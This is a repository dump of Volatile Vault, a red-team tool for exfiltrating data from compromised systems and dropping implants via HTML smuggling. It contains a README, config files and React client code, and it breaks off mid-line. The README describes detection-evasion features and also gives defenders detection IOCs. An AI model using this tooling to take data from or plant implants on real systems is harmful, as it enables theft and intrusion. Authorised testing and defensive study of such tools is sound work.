├── .dockerignore ├── .env.template ├── .gitignore ├── .prettierrc ├── .vscode └── launch.json ├── Dockerfile ├── LICENSE ├── README.md ├── client ├── .env.sample ├── .gitignore ├── README.md ├── package-lock.json ├── package.json ├── public │ ├── favicon.ico │ ├── index.html │ ├── logo192.png │ ├── logo512.png │ ├── manifest.json │ ├── robots.txt │ └── vault.png ├── src │ ├── App.tsx │ ├── components │ │ ├── Authentication.tsx │ │ ├── BasicSelector.tsx │ │ ├── BasicWizard.tsx │ │ ├── EnterPassword.tsx │ │ ├── Main.tsx │ │ ├── ModeSelector.tsx │ │ ├── extensions │ │ │ ├── ExtensionManager.ts │ │ │ ├── exfil │ │ │ │ ├── AwsCloudFrontExfil.tsx │ │ │ │ ├── BasicHttpExfil.tsx │ │ │ │ └── DummyExfil.tsx │ │ │ ├── extension.tsx │ │ │ └── storage │ │ │ │ ├── AwsS3.tsx │ │ │ │ ├── DummyStorage.tsx │ │ │ │ └── FileSystem.tsx │ │ └── ui │ │ │ ├── CustomSteps.tsx │ │ │ ├── EventTable.tsx │ │ │ ├── GenericHttpDownload.tsx │ │ │ └── GenericHttpUpload.tsx │ ├── index.tsx │ ├── logo.svg │ ├── react-app-env.d.ts │ └── utils │ │ ├── Api.ts │ │ ├── Config.ts │ │ ├── Crypto.ts │ │ ├── Entropy.ts │ │ ├── Files.ts │ │ └── Snack.ts └── tsconfig.json ├── docker-compose.prod.yml ├── make_test_files.sh ├── screenshots ├── screenshot1-select.png ├── screenshot2-upload.png └── screenshot3-download.png └── server ├── .gitignore ├── README.md ├── config.example.yaml ├── logs └── .gitkeep ├── nodemon.json ├── package-lock.json ├── package.json ├── src ├── config │ ├── config.ts │ ├── instance.ts │ └── util.ts ├── extensions │ ├── exfil │ │ ├── AwsCloudFront │ │ │ ├── README.md │ │ │ ├── awscloudfront.ts │ │ │ ├── distributionconfig.json │ │ │ └── wrapper.ts │ │ ├── BasicHttp │ │ │ ├── README.md │ │ │ └── basichttp.ts │ │ └── provider.ts │ ├── extension.ts │ ├── repository.ts │ └── storage │ │ ├── AwsS3 │ │ ├── README.md │ │ ├── awss3.ts │ │ ├── bucketpolicy.json │ │ └── wrapper.ts │ │ ├── FileSystem │ │ ├── README.md │ │ └── filesystem.ts │ │ └── provider.ts ├── fs.ts ├── jwt.ts ├── logging.ts ├── routes │ ├── auth.ts │ ├── config.ts │ └── index.ts ├── server.ts └── streams.ts └── tsconfig.json /.dockerignore: -------------------------------------------------------------------------------- 1 | .dockerignore 2 | .git 3 | .gitignore 4 | .prettierrc 5 | **/node_modules 6 | 7 | -------------------------------------------------------------------------------- /.env.template: -------------------------------------------------------------------------------- 1 | BACKEND_PORT=1234 2 | FILE_EXPIRY=60 # Lifetime in minutes 3 | FILE_SIZE=104857600 # Maximum file size of uploads of encrypted blobs in bytes 4 | FS_FOLDER=./files # Folder to store encrypted blobs in 5 | JWT_EXPIRY=12 # Lifetime in minutes 6 | TOTP_SECRET=ABC # Should be at least 120 bits -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | npm-debug.log 3 | client/src/compiled/ 4 | .env 5 | *.bin -------------------------------------------------------------------------------- /.prettierrc: -------------------------------------------------------------------------------- 1 | singleQuote: true 2 | -------------------------------------------------------------------------------- /.vscode/launch.json: -------------------------------------------------------------------------------- 1 | { 2 | // Use IntelliSense to learn about possible attributes. 3 | // Hover to view descriptions of existing attributes. 
4 | // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387 5 | "version": "0.2.0", 6 | "configurations": [ 7 | { 8 | "type": "node", 9 | "request": "launch", 10 | "name": "Backend", 11 | "skipFiles": [ 12 | "\\**" 13 | ], 14 | "runtimeExecutable": "npm", 15 | "runtimeArgs": [ 16 | "run-script", 17 | "start:nodemon" 18 | ], 19 | "cwd": "${workspaceFolder}/server", 20 | "outputCapture": "std" 21 | } 22 | ] 23 | } -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | # Setup and build the client 2 | 3 | FROM node:18-alpine as client 4 | 5 | WORKDIR /usr/app/client/ 6 | COPY client/package*.json ./ 7 | RUN npm install -qy 8 | COPY client/ ./ 9 | RUN rm ./.env 10 | RUN npm run build 11 | 12 | 13 | # Setup the server 14 | 15 | FROM node:18-alpine 16 | 17 | WORKDIR /usr/app/ 18 | COPY --from=client /usr/app/client/build/ ./server/public/ 19 | 20 | 21 | WORKDIR /usr/app/server/ 22 | COPY .env ./.env 23 | 24 | COPY server/package*.json ./ 25 | RUN npm install -qy 26 | COPY server/ ./ 27 | 28 | ENV PORT ${BACKEND_PORT} 29 | 30 | EXPOSE ${BACKEND_PORT} 31 | 32 | CMD ["npm", "start"] 33 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 Moritz Laurin Thomas 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 |

Volatile Vault

4 |
5 | 6 |

Volatile Vault is a secure data exfiltration & dropper platform for Red Team Operators by @molatho & @secdude.

7 |

Inspired by updog.

8 |
9 | 10 |
11 | 12 | > [!WARNING] 13 | > **Disclaimer:** This repository, including all code, scripts, and documentation contained herein, is provided by NVISO exclusively for educational and informational purposes. The contents of this repository are intended to be used solely as a learning resource. The authors of this repository expressly disclaim any responsibility for any misuse or unintended application of the tools, code, or information provided within this repository. 14 | > Users are solely responsible for ensuring that their use of the repository complies with applicable laws and regulations. The authors of this repository do not provide any warranties or guarantees regarding the accuracy, completeness, or suitability of the contents for any particular purpose. 15 | > If you do not agree with these terms, you are advised not to use or access this repository. 16 | 17 | # Table of Contents 18 | - [Screenshots](#screenshots) 19 | - [Use Cases](#use-cases) 20 | - [Features](#features) 21 | - [Plugin Concept](#plugin-concept) 22 | - [Roadmap](#roadmap) 23 | - [FAQs](#faqs) 24 | - [Usage / Installation](#usage--installation) 25 | - [Deployment](#deployment) 26 | - [Development](#development) 27 | - [Contributing](#contributing) 28 | 29 | 30 | # Screenshots 31 | 32 |
33 | 34 | 35 | 36 |
37 | 
38 | # Use Cases
39 | 
40 | - **Data exfiltration**: Operators can upload sensitive files from compromised target systems to exfiltrate data securely, without any reliance on potentially untrustworthy third parties.
41 | - **Dropping implants**: Operators can upload implants from their machines, download them on target systems and leverage HTML smuggling to transmit and deploy their implants more covertly.
42 | 
43 | # Features
44 | 
45 | - **Security first**: All data is encrypted/decrypted (using AES-GCM) and compressed/decompressed (ZIP DEFLATE) in the browser; no sensitive data hits the backend in plain text and no potentially sensitive key material ever leaves the browser (a sketch of this pipeline follows this list).
46 | - **Volatile storage**: All uploaded data has a preconfigured lifetime (e.g. one hour) after which it gets deleted on the server side. Any previously stored encrypted blobs are removed on the server side upon startup of the server application.
47 | - **AWS integration**: Volatile Vault can spin up and configure CloudFront distributions to proxy web traffic for uploads & downloads. Furthermore, it can create S3 buckets, upload files to them and download files from them!
48 | - **TOTP authentication**: Access to the service is granted by using a shared secret for TOTP authentication, making it easy to use and more resilient to credential leakage.
49 | - **Configurable**: Specifics such as the maximum allowed file size and lifetime of uploaded blobs can be configured in the [server](server/README.md)'s `config.yml` file before deployment of the application.
50 | - **Chunks + HTTPS redirectors**: Upload the encrypted blobs in chunks via a range of HTTP redirectors pointing to the service.
51 | - **Plugin system**: You can freely configure how data is uploaded/downloaded and where it is stored thanks to Volatile Vault's plugin system, which allows the integration of multiple file storages and exfiltration mechanisms.
52 | 
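The following minimal sketch illustrates the browser-side pipeline described above: compress with `jszip` (a dependency listed in `client/package.json`), then encrypt with WebCrypto AES-GCM. The project's actual implementation lives in `client/src/utils/Crypto.ts` and `client/src/utils/Files.ts` (not included in this excerpt), so details such as the key-derivation scheme and its parameters are illustrative assumptions rather than the real values.

```typescript
import JSZip from 'jszip';

export async function packAndEncrypt(
  files: { name: string; data: ArrayBuffer }[],
  password: string
): Promise<{ ciphertext: ArrayBuffer; iv: Uint8Array; salt: Uint8Array }> {
  // Compress all selected files into a single ZIP (DEFLATE) archive in memory.
  const zip = new JSZip();
  for (const file of files) zip.file(file.name, file.data);
  const archive = await zip.generateAsync({
    type: 'arraybuffer',
    compression: 'DEFLATE',
  });

  // Derive an AES-GCM key from the user's password; neither the password nor
  // the derived key ever leaves the browser. The KDF and iteration count here
  // are illustrative assumptions, not necessarily what Crypto.ts uses.
  const salt = crypto.getRandomValues(new Uint8Array(16));
  const iv = crypto.getRandomValues(new Uint8Array(12));
  const keyMaterial = await crypto.subtle.importKey(
    'raw',
    new TextEncoder().encode(password),
    'PBKDF2',
    false,
    ['deriveKey']
  );
  const key = await crypto.subtle.deriveKey(
    { name: 'PBKDF2', salt, iterations: 100000, hash: 'SHA-256' },
    keyMaterial,
    { name: 'AES-GCM', length: 256 },
    false,
    ['encrypt']
  );

  // Only this opaque ciphertext (plus IV and salt) is handed to an exfil
  // transport for upload; the backend never sees plain text.
  const ciphertext = await crypto.subtle.encrypt(
    { name: 'AES-GCM', iv },
    key,
    archive
  );
  return { ciphertext, iv, salt };
}
```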
53 | ## Plugin Concept
54 | 
55 | Volatile Vault allows you to mix and match plugins for file storages ("storages") and exfiltration mechanisms ("exfils") to your heart's content. Storages are plugins that store and retrieve files - this could be the server's filesystem or a cloud storage such as AWS S3. Exfils are data transports that allow you to upload and download files to and from Volatile Vault - this could be a simple built-in HTTP transport or an entirely different protocol such as QUIC.
56 | 
57 | You can specify which storages and exfils to use by configuring them in (or omitting them from) your [server](server/README.md)'s configuration.
58 | 
59 | ## Roadmap
60 | 
61 | - **Rate limiting**: Limit the upload speed to the service so uploads won't be as easy to detect as bursts.
62 | - **Password-encrypted Archives**: Encrypt the archives themselves so they can't be read in plain text on disk.
63 | - **Duplicate plugin instances**: Allow plugins to be initialized and used multiple times instead of once per implementation.
64 | 
65 | ## FAQs
66 | 
67 | Here are some Q&A's addressing Volatile Vault's shortcomings:
68 | 
69 | > Q: Can we have multiple users?
70 | 
71 | A: No. The declared goal of this app was to provide an easy-to-use and secure platform to exfiltrate data. It is meant to be used only by small teams and for individual assessments, as part of your typical burner infrastructure.
72 | 
73 | > Q: Why does this use TOTP?
74 | 
75 | A: TOTP was chosen for its simplicity and its security implications: it's easy to set up (both parties only need to know the shared TOTP secret), and even if a SOC gets ahold of submitted tokens, there's only a very brief time window in which they can be re-used.
76 | 
77 | > Q: Why do I need to enter the TOTP every time I open/refresh the page? Can't we re-use our session after authenticating?
78 | 
79 | A: This application is not meant to be used over long time periods but only for exfiltrating data in select instances. Furthermore, by avoiding saving cookies or using localStorage, its footprint on the target system is reduced even further.
80 | 
81 | # Detection
82 | 
83 | We recommend implementing thorough network monitoring in any corporate context. Network activity related to the usage of Volatile Vault could be detected based on:
84 | - Multiple transmissions of similar size to newly registered CloudFront domains.
85 | - Large uploads via QUIC.
86 | 
87 | Additionally, in case TLS inspection is performed, one could scan for IOCs associated with Volatile Vault, such as static strings:
88 | - `Non-functional dummy storage. This won't do anything and is only used for testing the frontend. It offers all capabilities Volatile Vault provides to storage extensions.` (taken from [DummyStorage](https://github.com/molatho/VolatileVault/blob/b0d79e908f7d92c05aabbdea181a2dec88580956/client/src/components/extensions/storage/DummyStorage.tsx#L15))
89 | - `Welcome to Volatile Vault. This screen gives you fine-grained control over the way your data is being uploaded, downloaded and stored. Use the following wizard to configure your up- & downloads!` (taken from [BasicWizard](https://github.com/molatho/VolatileVault/blob/78afd19cb51eb26d71de25f8300ed6483d4604e3/client/src/components/BasicWizard.tsx#L214))
90 | 
91 | # Usage / Installation
92 | 
93 | ## Deployment
94 | 
95 | 1. Install Docker: `docker` and `docker compose` (ref [Install Docker Engine](https://docs.docker.com/engine/install/))
96 | 2. **Configure the [server](server/README.md)** (seriously, you can't skip this) and [client](client/README.md)
97 | 3. Build and start the container by running `docker compose -f docker-compose.prod.yml up`
98 | 
99 | ## Development
100 | 
101 | 1. Install Node.js (v20+): `node` and `npm` (ref [Download Node.js](https://nodejs.org/en/download/package-manager))
102 | 2. Install node dependencies of the client and server by `cd`'ing into their respective subdirectories and issuing `npm i`
103 | 3. **Configure the [server](server/README.md)** and [client](client/README.md)
104 | 4. Start the [server](ref) and [client](ref)
105 | 
106 | # Contributing
107 | 
108 | Pull requests are very welcome! If you would like to contribute a new storage or exfil plugin, the sketch below shows where client-side extensions are registered.
109 | 
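On the client, the available plugins are instantiated in `client/src/components/extensions/ExtensionManager.ts` (included further below in this dump), so wiring up an additional transport is roughly a one-line change there. The sketch below mirrors that file's imports and signature but adds a hypothetical `MyExfil` class used purely for illustration; the real file's debug-only branch is omitted.

```typescript
import Api, { ApiConfigResponse } from '../../utils/Api';
import { ExfilExtension } from './Extension';
import { BasicHttpExfil } from './exfil/BasicHttpExfil';
import { AwsCloudFrontExfil } from './exfil/AwsCloudFrontExfil';
// Hypothetical new transport, for illustration only:
import { MyExfil } from './exfil/MyExfil';

export function initializeExfilExtensions(
  api: Api,
  config: ApiConfigResponse
): ExfilExtension[] {
  // Each extension reports via isPresent() whether its server-side
  // counterpart is configured, and the wizard filters on that, so
  // registering an extension here is harmless if the server omits it.
  return [
    new BasicHttpExfil(api, config),
    new AwsCloudFrontExfil(api, config),
    new MyExfil(api, config),
  ];
}
```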
--------------------------------------------------------------------------------
/client/.env.sample:
--------------------------------------------------------------------------------
1 | REACT_APP_BASE_URL=http://localhost:8888
2 | DEBUG=true
--------------------------------------------------------------------------------
/client/.gitignore:
--------------------------------------------------------------------------------
1 | # See https://help.github.com/articles/ignoring-files/ for more about ignoring files.
2 | 
3 | # dependencies
4 | /node_modules
5 | /.pnp
6 | .pnp.js
7 | 
8 | # testing
9 | /coverage
10 | 
11 | # production
12 | /build
13 | 
14 | # misc
15 | .DS_Store
16 | .env.local
17 | .env.development.local
18 | .env.test.local
19 | .env.production.local
20 | 
21 | npm-debug.log*
22 | yarn-debug.log*
23 | yarn-error.log*
24 | 
--------------------------------------------------------------------------------
/client/README.md:
--------------------------------------------------------------------------------
1 | 
2 | 3 |

Volatile Vault - Client

4 |
5 |
6 | 
7 | The Volatile Vault client lets users interface with its powerful backend. It's designed to be simple and easy to use.
8 | 
9 | # Configuration
10 | 
11 | The frontend itself requires little configuration, as it queries information about enabled & configured storages and exfils from the [server](../server/README.md) at runtime.
12 | 
13 | It can be configured by editing its `.env` file. You can find a template [here](.env.sample).
14 | 
15 | ```env
16 | REACT_APP_BASE_URL=http://localhost:8888
17 | DEBUG=true
18 | ```
19 | 
20 | Fields:
21 | 
22 | - `REACT_APP_BASE_URL`: Base URL of the API. Useful for debugging when the API and frontend aren't served by the same webserver.
23 | - `DEBUG`: Enables more verbose logging and the inclusion of "Dummy" storages and exfils. Useful for testing specific configurations at runtime.
24 | 
--------------------------------------------------------------------------------
/client/package.json:
--------------------------------------------------------------------------------
1 | {
2 |   "name": "client",
3 |   "version": "0.1.0",
4 |   "private": true,
5 |   "dependencies": {
6 |     "@babel/plugin-proposal-private-property-in-object": "^7.21.11",
7 |     "@emotion/react": "^11.11.3",
8 |     "@emotion/styled": "^11.11.0",
9 |     "@fontsource/roboto": "^5.0.8",
10 |     "@mui/icons-material": "^5.15.8",
11 |     "@mui/material": "^5.15.7",
12 |     "@mui/styled-engine-sc": "^6.0.0-alpha.15",
13 |     "@testing-library/jest-dom": "^5.17.0",
14 |     "@testing-library/react": "^13.4.0",
15 |     "@testing-library/user-event": "^13.5.0",
16 |     "@types/jest": "^27.5.2",
17 |     "@types/node": "^16.18.79",
18 |     "@types/react": "^18.2.55",
19 |     "@types/react-dom": "^18.2.18",
20 |     "axios": "^1.6.7",
21 |     "bytes": "^3.1.2",
22 |     "file-saver": "^2.0.5",
23 |     "jszip": "^3.10.1",
24 |     "moment": "^2.30.1",
25 |     "notistack": "^3.0.1",
26 |     "react": "^18.2.0",
27 |     "react-dom": "^18.2.0",
28 |     "react-dropzone": "^14.2.3",
29 |     "react-scripts": "^4.0.1",
30 |     "styled-components": "^6.1.8",
31 |     "typescript": "^4.9.5",
32 |     "web-vitals": "^2.1.4"
33 |   },
34 |   "scripts": {
35 |     "start": "react-scripts --openssl-legacy-provider start",
36 |     "build": "react-scripts --openssl-legacy-provider build",
37 |     "eject": "react-scripts eject"
38 |   },
39 |   "eslintConfig": {
40 |     "extends": [
41 |       "react-app",
42 |       "react-app/jest"
43 |     ]
44 |   },
45 |   "browserslist": {
46 |     "production": [
47 |       ">0.2%",
48 |       "not dead",
49 |       "not op_mini all"
50 |     ],
51 |     "development": [
52 |       "last 1 chrome version",
53 |       "last 1 firefox version",
54 |       "last 1 safari version"
55 |     ]
56 |   },
57 |   "devDependencies": {
58 |     "@types/bytes": "^3.1.4",
59 |     "@types/file-saver": "^2.0.7"
60 |   },
61 |   "resolutions": {
62 |     "**/@typescript-eslint/eslint-plugin": "^4.1.1",
63 |     "**/@typescript-eslint/parser": "^4.1.1"
64 |   }
65 | }
66 | 
--------------------------------------------------------------------------------
/client/public/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/client/public/favicon.ico
--------------------------------------------------------------------------------
/client/public/index.html:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 
4 | 
5 | 
6 | 
7 | 
8 | 
12 | 
13 | 
17 | 
18 | 
27 | Volatile Vault
28 | 
29 | 
30 | 
31 | 
32 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /client/public/logo192.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/client/public/logo192.png -------------------------------------------------------------------------------- /client/public/logo512.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/client/public/logo512.png -------------------------------------------------------------------------------- /client/public/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "short_name": "React App", 3 | "name": "Create React App Sample", 4 | "icons": [ 5 | { 6 | "src": "favicon.ico", 7 | "sizes": "64x64 32x32 24x24 16x16", 8 | "type": "image/x-icon" 9 | }, 10 | { 11 | "src": "logo192.png", 12 | "type": "image/png", 13 | "sizes": "192x192" 14 | }, 15 | { 16 | "src": "logo512.png", 17 | "type": "image/png", 18 | "sizes": "512x512" 19 | } 20 | ], 21 | "start_url": ".", 22 | "display": "standalone", 23 | "theme_color": "#000000", 24 | "background_color": "#ffffff" 25 | } 26 | -------------------------------------------------------------------------------- /client/public/robots.txt: -------------------------------------------------------------------------------- 1 | # https://www.robotstxt.org/robotstxt.html 2 | User-agent: * 3 | Disallow: 4 | -------------------------------------------------------------------------------- /client/public/vault.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/molatho/VolatileVault/85353c5310749299387598ff77f7d81daf8bd248/client/public/vault.png -------------------------------------------------------------------------------- /client/src/App.tsx: -------------------------------------------------------------------------------- 1 | import Main from './components/Main'; 2 | import { createTheme, CssBaseline } from '@mui/material'; 3 | import { ThemeProvider } from 'styled-components'; 4 | import { SnackbarProvider } from 'notistack'; 5 | 6 | const theme = createTheme({ 7 | palette: { 8 | mode: 'dark', 9 | }, 10 | }); 11 | 12 | function App() { 13 | return ( 14 | 15 | 16 | 17 |
18 | 19 | ); 20 | } 21 | 22 | export default App; 23 | -------------------------------------------------------------------------------- /client/src/components/Authentication.tsx: -------------------------------------------------------------------------------- 1 | import { useEffect, useState } from 'react'; 2 | import Api, { ApiResponse } from '../utils/Api'; 3 | import { snackError, snackInfo, snackSuccess } from '../utils/Snack'; 4 | import { 5 | Checkbox, 6 | FormControlLabel, 7 | Stack, 8 | TextField, 9 | Typography, 10 | } from '@mui/material'; 11 | 12 | interface AuthenticationProps { 13 | api: Api; 14 | onAuthenticated: (token: string) => void; 15 | } 16 | 17 | export default function Authentication({ 18 | api, 19 | onAuthenticated, 20 | }: AuthenticationProps) { 21 | const [totp, setTotp] = useState(''); 22 | const [totpEditAvailable, setTotpEditAvailable] = useState(true); 23 | const [lastError, setLastError] = useState(undefined); 24 | const [authenticated, setAuthenticated] = useState( 25 | undefined 26 | ); 27 | const [saveToken, setSaveToken] = useState(false); 28 | 29 | useEffect(() => { 30 | async function checkAuth() { 31 | const token = api.getToken(); 32 | try { 33 | const res = await api.isAuthenticated(); 34 | setAuthenticated(res.success); 35 | if (token == null) snackSuccess('Authentication successful'); 36 | onAuthenticated(token as string); 37 | } catch (err) { 38 | if (token != null) { 39 | api.clearToken(); 40 | snackError('Token expired or invalid; you need to re-authenticate.'); 41 | } else { 42 | snackInfo('You need to authenticate'); 43 | } 44 | setAuthenticated(false); 45 | } 46 | } 47 | checkAuth(); 48 | }, []); 49 | 50 | const onTotpChange = (event: React.ChangeEvent) => { 51 | setTotp(event.target.value); 52 | }; 53 | 54 | useEffect(() => { 55 | async function authenticate() { 56 | if (totp.length !== 6) return; 57 | setLastError(undefined); 58 | setTotpEditAvailable(false); 59 | try { 60 | const auth = await api.authenticate(totp); 61 | setAuthenticated(auth.success); 62 | setLastError(auth.success ? undefined : auth.message); 63 | snackSuccess('Authentication successful'); 64 | if (saveToken) api.saveToken(); 65 | onAuthenticated(auth.token as string); 66 | } catch (error) { 67 | const err = error as ApiResponse; 68 | setLastError(err.message); 69 | setTimeout(() => { 70 | setLastError(undefined); 71 | setTotpEditAvailable(true); 72 | setTotp(''); 73 | }, 1000); 74 | snackError(err.message); 75 | } 76 | } 77 | authenticate(); 78 | }, [totp]); 79 | 80 | return ( 81 | <> 82 | {authenticated === undefined && ( 83 | 84 | Validating authentication... 
85 | 86 | )} 87 | {authenticated === false && ( 88 | 89 | 99 | setSaveToken(ev.target.checked)} 104 | /> 105 | } 106 | label="Save token in localStorage" 107 | /> 108 | 109 | )} 110 | 111 | ); 112 | } 113 | -------------------------------------------------------------------------------- /client/src/components/BasicSelector.tsx: -------------------------------------------------------------------------------- 1 | import { useState } from 'react'; 2 | import { BasicInfoHolder } from './extensions/Extension'; 3 | import { styled } from '@mui/material/styles'; 4 | import ArrowForwardIosSharpIcon from '@mui/icons-material/ArrowForwardIosSharp'; 5 | import MuiAccordion, { AccordionProps } from '@mui/material/Accordion'; 6 | import MuiAccordionSummary, { 7 | AccordionSummaryProps, 8 | } from '@mui/material/AccordionSummary'; 9 | import MuiAccordionDetails from '@mui/material/AccordionDetails'; 10 | import Typography from '@mui/material/Typography'; 11 | import { AccordionActions, Button } from '@mui/material'; 12 | 13 | const Accordion = styled((props: AccordionProps) => ( 14 | 15 | ))(({ theme }) => ({ 16 | border: `1px solid ${theme.palette.divider}`, 17 | '&:not(:last-child)': { 18 | borderBottom: 0, 19 | }, 20 | '&::before': { 21 | display: 'none', 22 | }, 23 | })); 24 | 25 | const AccordionSummary = styled((props: AccordionSummaryProps) => ( 26 | } 28 | {...props} 29 | /> 30 | ))(({ theme }) => ({ 31 | backgroundColor: 32 | theme.palette.mode === 'dark' 33 | ? 'rgba(255, 255, 255, .05)' 34 | : 'rgba(0, 0, 0, .03)', 35 | flexDirection: 'row-reverse', 36 | '& .MuiAccordionSummary-expandIconWrapper.Mui-expanded': { 37 | transform: 'rotate(90deg)', 38 | }, 39 | '& .MuiAccordionSummary-content': { 40 | marginLeft: theme.spacing(1), 41 | }, 42 | })); 43 | 44 | const AccordionDetails = styled(MuiAccordionDetails)(({ theme }) => ({ 45 | padding: theme.spacing(2), 46 | borderTop: '1px solid rgba(0, 0, 0, .125)', 47 | })); 48 | 49 | type SelectorType = 'Exfil' | 'Storage'; 50 | 51 | interface BasicSelectorProps { 52 | type: SelectorType; 53 | items: BasicInfoHolder[]; 54 | onSelected: (idx: number) => void; 55 | } 56 | 57 | export default function BasicSelector({ 58 | type, 59 | items, 60 | onSelected, 61 | }: BasicSelectorProps) { 62 | const [idx, setIdx] = useState(0); 63 | const [expanded, setExpanded] = useState(0); 64 | 65 | return ( 66 | <> 67 | {items.map((item, idx) => ( 68 | setExpanded(idx)} 72 | > 73 | 74 | {item.displayName} 75 | 76 | {item.description} 77 | 78 | 79 | 80 | 81 | ))} 82 | 83 | ); 84 | } 85 | -------------------------------------------------------------------------------- /client/src/components/BasicWizard.tsx: -------------------------------------------------------------------------------- 1 | import { useEffect, useState } from 'react'; 2 | import Api, { ApiConfigResponse, ApiResponse } from '../utils/Api'; 3 | import ModeSelector, { SelectedMode } from './ModeSelector'; 4 | import { ExfilExtension, StorageExtension } from './extensions/Extension'; 5 | import { 6 | getStorages, 7 | initializeExfilExtensions, 8 | } from './extensions/ExtensionManager'; 9 | import { 10 | Typography, 11 | Stepper, 12 | Step, 13 | StepLabel, 14 | StepContent, 15 | Box, 16 | Button, 17 | StepButton, 18 | } from '@mui/material'; 19 | import Authentication from './Authentication'; 20 | import BasicSelector from './BasicSelector'; 21 | import { snackError } from '../utils/Snack'; 22 | 23 | interface WizardProps { 24 | api: Api; 25 | onFinished: ( 26 | config: ApiConfigResponse, 27 | mode: 
SelectedMode, 28 | exfil: ExfilExtension, 29 | storage?: StorageExtension 30 | ) => void; 31 | } 32 | 33 | enum Steps { 34 | Authentication, 35 | SelectAction, 36 | SelectExfil, 37 | ConfigureExfil, 38 | SelectStorage, 39 | ConfigureStorage, 40 | Confirm, 41 | } 42 | 43 | export default function BasicWizard({ api, onFinished }: WizardProps) { 44 | const [storages, _] = useState(getStorages()); 45 | const [authenticated, setAuthenticated] = useState(false); 46 | const [config, setConfig] = useState( 47 | undefined 48 | ); 49 | const [mode, setMode] = useState('None'); 50 | const [exfils, setExfils] = useState([]); 51 | const [selectedExfil, setSelectedExfil] = useState( 52 | null 53 | ); 54 | const [exfilConfigured, setExfilConfigured] = useState(false); 55 | const [selectedStorage, setSelectedStorage] = 56 | useState(null); 57 | const [storageConfigured, setStorageConfigured] = useState(false); 58 | const [step, setStep] = useState(Steps.Authentication); 59 | const isUploadMode = mode == 'UploadChunked' || mode == 'UploadSingle'; 60 | 61 | 62 | useEffect(() => { 63 | async function getConfig() { 64 | try { 65 | const res = await api.config(); 66 | setConfig(res); 67 | } catch (error) { 68 | const err = error as ApiResponse; 69 | snackError(`Failed querying config: ${err.message}`); 70 | setAuthenticated(false); 71 | } 72 | } 73 | if (authenticated) getConfig(); 74 | }, [authenticated]); 75 | 76 | useEffect(() => { 77 | if (!config) return; 78 | setExfils( 79 | initializeExfilExtensions(api, config).filter((e) => e.isPresent()) 80 | ); 81 | }, [config]); 82 | 83 | function onAuthenticated(): void { 84 | setAuthenticated(true); 85 | setStep(Steps.SelectAction); 86 | } 87 | 88 | function onModeSelected(type: SelectedMode, exfils: ExfilExtension[]): void { 89 | setMode(type); 90 | setExfils(exfils); 91 | setStep(Steps.SelectExfil); 92 | } 93 | 94 | function onExfilSelected(idx: number): void { 95 | const exfil = exfils[idx]; 96 | setSelectedExfil(exfil); 97 | 98 | var nextStep = Steps.ConfigureExfil; 99 | 100 | if (!exfil.isConfigurable) { 101 | nextStep = Steps.SelectStorage; // Skip configuration step 102 | if (!isUploadMode) nextStep = Steps.ConfigureStorage + 1; // Skip storage selection + configuration step for downloads 103 | } 104 | 105 | setStep(nextStep); 106 | } 107 | 108 | function onStorageSelected(idx: number): void { 109 | const storage = storages[idx]; 110 | setSelectedStorage(storage); 111 | if (!storage.isConfigurable) 112 | setStep(Steps.ConfigureStorage + 1); // Skip configuration step 113 | else 114 | setStep(Steps.ConfigureStorage); 115 | } 116 | 117 | function modeToString(mode: SelectedMode): string { 118 | // "You'd like to ..." 
119 | switch (mode) { 120 | case 'None': 121 | return 'do nothing'; 122 | case 'DownloadSingle': 123 | return 'perform a basic download'; 124 | case 'UploadSingle': 125 | return 'perform a basic upload'; 126 | case 'DownloadChunked': 127 | return 'perform a chunked download'; 128 | case 'UploadChunked': 129 | return 'perform a chunked upload'; 130 | } 131 | } 132 | 133 | function onStartOver(): void { 134 | setSelectedStorage(null); 135 | setSelectedExfil(null); 136 | setExfils( 137 | initializeExfilExtensions(api, config as ApiConfigResponse).filter((e) => 138 | e.isPresent() 139 | ) 140 | ); 141 | setMode('None'); 142 | setStep(0); 143 | setExfilConfigured(false); 144 | setStorageConfigured(false); 145 | } 146 | 147 | function onFinish() { 148 | onFinished( 149 | config as ApiConfigResponse, 150 | mode, 151 | selectedExfil as ExfilExtension, 152 | selectedStorage ? selectedStorage : undefined 153 | ); 154 | } 155 | 156 | const getExfilConfigLabel = () => { 157 | if (!selectedExfil) return No transport selected yet.; 158 | if (exfilConfigured) return {selectedExfil.displayName} configured.; 159 | if (!selectedExfil.isConfigurable) 160 | return {selectedExfil?.displayName} is not configurable.; 161 | 162 | return <>Configure {selectedExfil.displayName}:; 163 | }; 164 | 165 | const getStorageConfigLabel = () => { 166 | if 